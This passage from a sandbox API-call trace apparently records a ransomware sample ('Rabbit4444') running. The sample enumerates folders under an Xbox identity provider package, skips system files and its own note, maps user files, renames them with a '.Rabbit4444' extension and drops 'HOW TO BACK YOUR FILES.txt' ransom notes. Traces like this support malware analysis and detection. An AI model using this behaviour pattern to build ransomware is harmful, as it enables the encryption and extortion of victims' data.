dwFileAttributes=0x82) returned 1 [0062.011] CloseHandle (hObject=0x27c) returned 1 [0062.016] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings") returned 92 [0062.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.016] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee489bf5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0062.016] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.016] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.016] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.016] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.016] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee489bf5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.016] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.016] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.016] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.016] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.016] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.016] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee489bf5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee489bf5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee489bf5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.016] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.016] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.016] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf213ca5b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0062.016] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.016] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.016] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0062.016] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0062.016] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0062.017] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0062.017] lstrcpyW (in: lpString1=0x130ebf2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0062.017] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0062.018] lstrlenW (lpString="roaming.lock") returned 12 [0062.018] lstrlenW (lpString="Rabbit4444") returned 10 [0062.018] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0062.018] lstrlenW (lpString=".dll") returned 4 [0062.018] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0062.018] lstrlenW (lpString=".lnk") returned 4 [0062.018] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0062.018] lstrlenW (lpString=".ini") returned 4 [0062.018] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0062.018] lstrlenW (lpString=".sys") returned 4 [0062.018] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0062.018] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0062.018] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0062.018] lstrcpyW (in: lpString1=0x130ebf2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0062.018] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0062.018] lstrlenW (lpString="settings.dat") returned 12 [0062.018] lstrlenW (lpString="Rabbit4444") returned 10 [0062.018] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0062.019] lstrlenW (lpString=".dll") returned 4 [0062.019] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0062.019] lstrlenW (lpString=".lnk") returned 4 [0062.019] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0062.019] lstrlenW (lpString=".ini") returned 4 [0062.019] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0062.019] lstrlenW (lpString=".sys") returned 4 [0062.019] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0062.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.019] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.019] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15332983157) returned 1 [0062.019] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.019] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0062.019] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0062.019] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0062.020] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123308 [0062.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0062.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123308 | out: hHeap=0xe0000) returned 1 [0062.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0062.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123308 [0062.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0062.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123308 | out: hHeap=0xe0000) returned 1 [0062.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0062.023] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15333352076) returned 1 [0062.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0062.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0062.023] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.023] CloseHandle (hObject=0x260) returned 1 [0062.023] CloseHandle (hObject=0x298) returned 1 [0062.023] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 116 [0062.023] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0062.025] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0062.026] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0062.026] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.027] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.027] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.028] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.028] CloseHandle (hObject=0x298) returned 1 [0062.028] CloseHandle (hObject=0x27c) returned 1 [0062.028] GetCurrentThreadId () returned 0xd98 [0062.028] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0062.028] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState" [0062.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115dd0 | out: hHeap=0xe0000) returned 1 [0062.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0062.029] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState" [0062.029] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\" [0062.029] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0062.029] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.030] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.033] FlushFileBuffers (hFile=0x27c) returned 1 [0062.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.034] CloseHandle (hObject=0x27c) returned 1 [0062.034] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState") returned 96 [0062.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.034] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4afdb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.035] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.035] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.035] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.035] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.035] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4afdb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.035] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.035] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.035] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.035] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.035] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.035] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4afdb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4afdb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.035] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.035] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.035] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4afdb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4afdb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.035] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.035] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.036] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.036] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.036] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.036] CloseHandle (hObject=0x298) returned 1 [0062.036] CloseHandle (hObject=0x27c) returned 1 [0062.036] GetCurrentThreadId () returned 0xd98 [0062.036] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0062.036] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState" [0062.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123240 | out: hHeap=0xe0000) returned 1 [0062.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0062.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState" [0062.036] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\" [0062.036] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0062.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.037] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.040] FlushFileBuffers (hFile=0x27c) returned 1 [0062.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.041] CloseHandle (hObject=0x27c) returned 1 [0062.041] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState") returned 94 [0062.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.041] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0062.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.041] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.041] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.041] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.042] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.042] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.042] lstrcmpiW 